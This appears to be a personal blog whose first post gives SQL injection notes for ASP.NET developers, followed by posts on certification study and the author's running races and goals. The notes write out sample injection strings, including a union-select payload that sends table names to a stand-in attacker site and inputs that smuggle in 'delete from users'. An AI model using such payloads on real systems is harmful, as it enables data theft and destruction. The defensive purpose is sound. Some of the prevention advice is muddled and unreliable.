05.24.13
by

SQL Injection Notes

What is SQL injection?  It’s where malicious users try to access your database from your website. Let’s take a look at some entries that can compromise your database and some solutions. 

You have a text box that takes a string to filter data.  What happens when the following strings are entered?

1) when the app sends the information in the query string

Example: x’ union select ‘http://AttackerSite?table=’ %2b name %2b @@version= %2b ”,name,’3′,’4′ from systables order by 2—%’

    -This will send a list of tables in the database to the attacker’s site.  You can see the data being sent if you have fiddler running OR right clicking on the page and selecting “View Source”.

2)  If you do a replace in you code to replace –,–, ‘ 

query = “select * from users where loginname=\”{0}\”";
    dangerousInput=”\”; delete from users -’-”;
    dangerousInput.Replace(“–”,”")
        .Replace(“‘”,”");

3)  query = “select * from users where userid={0}”;
    dangerousInput = “3;delete from users;”
    dangerousInput.Replace(“-”,”")
        .Replace(“‘”,”");

4) Inline SQL

     You will need to set security on every table to limit the access to the table

5) Stored Procedures

    You don’t have to set the security for every table but make sure to parameterize the fields.

How to Prevent

- Ensure All calls are Parameterized.

- Store Procedure Calls

- Inline SQL (SQL in code)

- No concatenated strings

Var sql = string.Format(“select * from table where {0}”, fromWhereclause(userInput)”)

- You can use regular expression to limit the data that you except.

     example: regex.replace(searchText, “[^a-zA-z0-9 ]”, “”)

·-Use an ORM like Entity Framework

Tools to check how secure your site is:

   SQL Permission Auditor
       – use to check to a users permissions
       – can be found on CodePlex
   CAT.NET
   FXcop

References:

Adam Tuliper’s Hack-proofing Your ASP.NET Web Applications

05.22.13
by

Notes for MS Certification test 70-486

On February 15th, 2013 I passed the Microsoft Certification test 70-480 Programming in HTML5 with JavaScript and CSS3.

Now I’m working towards passing the 70-486 Web Applications.  The next few post will contain notes of things I’ve learned while studying for the 70-486.  While I was studying I was trying to figure out how am I going to remember all this stuff after the test and decided that I would my notes in my blog so I could easily access the information in the future and maybe someone else will find the information useful.

05.22.13
by

Athlinks

 

 

Found a cool website to tack my race results http://athlinks.com.  Athlinks will find your races based on your name.  The you selected the races that are really you.

Here are all of my result.  While I’m not fast I can see improvements.  Sometimes my pace is slower because I have my kids with me so I’m running/walking with them.

 

image

04.15.12
by

Setting a PR

Since the last post I have been busy running.  Here are my race times.

Egg Shell Shuffle 5k 41:57
Race to Wrigley 5k 37:51 PR

I’ve signed up for a 10k in July.  Still trying to decide if is should do a half this year.

Right now I’m just really happy to run and see that my clothes are starting to get loose.  While I haven’t lost a lot weight my body is changing and the jeans that I was just barely able to get on I can wear comfortably.

That’s it this post.

03.28.12
by

Shamrock Shuffle 2012

 

On Sunday I participated in the Chicago Shamrock Shuffle.  While my time was nothing to write home about it the fact that I completed the 8k (4.97 miles) is something to write home about.  My time was 1:12:16. Without that bathroom break I wonder what my time would have been.  Unfortunately I stood in the corral for way to long before the race started.  Oh well next time I’ll know better.  SmileYes there will be a next time.  I’m so proud that I was able to over 4 miles of the 4.97 miles.  I actually think it was closer to 4.5 but I know it was at least 4 miles.

I think I finally found the 1/2 marathon that I want to run.  http://womenrockmn.org/information/ I just can’t bring myself to seriously consider the marathon.  Now to actually sign up.  I did sign up for a 5k on April 7th.  This should be fun.  I’m running for time.  I’m running because my daughter finally agreed to do a 5k (willingly).

Other than the 8k I was able to get out last night for 2.25 miles while my youngest roller bladed with me.  I need to get out yet today but I’m loosing my motivation REALLY fast. 

03.21.12
by

No More Excuses

 

Wow where does the time go. It’s been 10 days since my last post. It’s been an unusually warm March for the Midwest.  It’s been in the high 70s-mid 80s for 2 weeks.  I see so many people outside running when I drive home from work.  It makes we want to get out and run too.  I keep thinking of  NBC’s The Biggest Loser theme “No Excuses” but yet I keep finding excuses.  “I’m too tired to get up early.”  “I don’t feel like running this early.” “There’s not time tonight because I have to get the kids to X, Y and Z.  Then it’s bed time.” Last night my excuse was “I have to get my volunteering paperwork done.”  SIGH!!

OK enough negative talk.  So what I have I done in the last 10 days.  I’ve run a little over 9 miles in 2-3 mile blocks.  for the first time since having pneumonia I was able to run almost all of 3 miles at a pre pneumonia pace.  While it’s a slow 13 minute/mile pace it was nice to be able to run without having to walk.  The only reason for walking was the incline.

Today I set my alarm for 5:10 (instead of 4:45) and was able to get out the door and run.  All day I’ve had so much energy that I’m thinking I need to do this more often.  Since I’m doing an 8k on Sunday, which will be the longest distance I’ve run (or run/walked) I’ll be slowing my pace down.  Tomorrow I plan to go for walk either with the dogs or the adult Scout leaders.  Today was a great reminder of why I should get up and exercise in the morning.

I love that my 15 year old is giving me advise about running, stretching and strengthening exercises.  I’m so happy that he decided to go out for track this year.  He’s doing distance running and has been running with the Varsity boys.  I’m confident he will do great at track.  In the fall he plans to do cross country.  He doesn’t like me making excuses and is totally encouraging me to keep running.

Follow me on Twitter and see how I’m doing at the Chicago Shamrock Shuffle on Sunday.   I’ve set it up so that I plan to post a pre-race message, 5K split, finish split (8K) and post-race message (thanks to technology). 

03.11.12
by

Personal and Professional Goals

It’s good to have goals.  It’s even better to follow through on those goals.  January 1st is usually the time to set a goal (“New Years Resolution”).  This year for a New Years Resolutions I chose to set a personal goal that would take me months to complete.  I want to complete my first half marathon.  Recently I set a professional goal of completing my MCPD (Microsoft Certified Professional Developer).  I need a place to track my progress ups  for both goals.  I’ve decided that I’m going to use my blog which usually sits idol for months at a time to share my progress and hold myself accountable.  The first post in this series I want to share where I’m at today.

PERSONAL GOAL:

Complete a half marathon…  WOW This seams like it’s going to be impossible to be prepared to run 13.1 miles.  I’m considering 3 half marathons Lake Country on September 1st, Prairie State on October 6th, and Schaumburg Half Marathon at Thanksgiving time.  

I’m still consider myself a beginner runner.  I’ve run a 4 5k (Sept 2010, July 2011, 2- Nov. 2011) all of which I did very minimal training before hand.  My times were as follows

Date

Race

Time

Time           Pace
September 2010 Lake Villa Township 5k 41:34.7      13:25
July 4, 2011 Antioch Freedom Run 5k 44:11         14:14 HOT DAY!!
November 2011 Long Grove Turkey Trot 5k

41:23.3       13:21
November 2011 Schaumburg Turkey Trot 5k

40:41.9       13:07
February 12, 2012 North Shore Cupid’s Love Dash recovering from pneumonia didn’t run
March 25, 2012 Chicago Shamrock Shuffle 8k 2 weeks away

WOW, I finally have all my race times in one place and I can see that overall my pace has been slowly getting faster.  On January 31st I was diagnosed with pneumonia. It took me about 4 weeks to recover enough to start running again.  I have not done a lot of running in the last 2 weeks.  The only consistent thing I have done is hiked 3 for ~3 miles each time. I know I can complete the 8k but I know I will be running and walking.

To track my personal goals I will blog once a week with an update of how my running is going.

 

PROFESSIONAL GOAL

On September 19, 2011 I returned to the work force after being home raising my children for 12 years.  Before returning to work I had a goal to pass the Mircosoft’s .NET 3.5 certification test.  I took the test once and didn’t pass.  I never made it back to retake the test as that was the summer my mom sold her house and I had to help her move.  Now that I’m working again it is my goal to to complete a MCPD certification.  The decision I’m still trying to make is what path do I take (Sharepoint 2010 or Web Developer 4).  Part of my decision depends on what’s valuable to my employer, Woodmark Technologies, Inc

Watch for future post to see how I proceed.